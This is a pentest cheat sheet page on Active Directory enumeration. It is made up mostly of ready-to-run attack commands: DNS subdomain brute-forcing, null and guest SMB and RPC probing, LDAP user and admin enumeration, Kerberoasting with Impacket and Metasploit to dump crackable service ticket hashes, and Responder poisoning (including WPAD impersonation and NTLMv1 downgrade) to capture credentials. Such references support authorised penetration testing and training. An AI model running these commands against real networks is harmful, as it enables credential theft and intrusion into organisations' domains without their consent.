Cheatsheet
  • Pentest
    • Reconnaissance
    • Network Scanning and Enumeration
    • Active Directory
      • Enumeration
      • Getting Credentials
      • Lateral Movement
      • Privilege Escalation
Powered by GitBook
On this page
  1. Pentest
  2. Active Directory

Enumeration

PreviousActive DirectoryNextGetting Credentials

Last updated 6 months ago

  1. Recon Activity:

Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.

gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

  1. Check for null and Guest access on smb services (this won't work on modern Windows versions):

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

rpcclient -U "" -N <IP> #No creds

smbclient --no-pass -L //<IP> # Null user

  1. Enumerate LDAP

nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

Check null credentials or if your credentials are valid:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

  1. Kerberoast

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes

  1. Poison the network

Running Responder

  • To run Responder with default settings: responder -I <Interface>

  • For more aggressive probing (with potential side effects): responder -I <Interface> -P -r -v

  • Techniques to capture NTLMv1 challenges/responses for easier cracking: responder -I <Interface> --lm --disable-ess

  • WPAD impersonation can be activated with: responder -I <Interface> --wpad

  • NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: responder.py -I <interface> -Pv

GitHub - ropnop/go-windapsearch: Utility to enumerate users, groups and computers from a Windows domain through LDAP queriesGitHub
Logo
War RoomWar Room
War RoomWar Room
Logo
Logo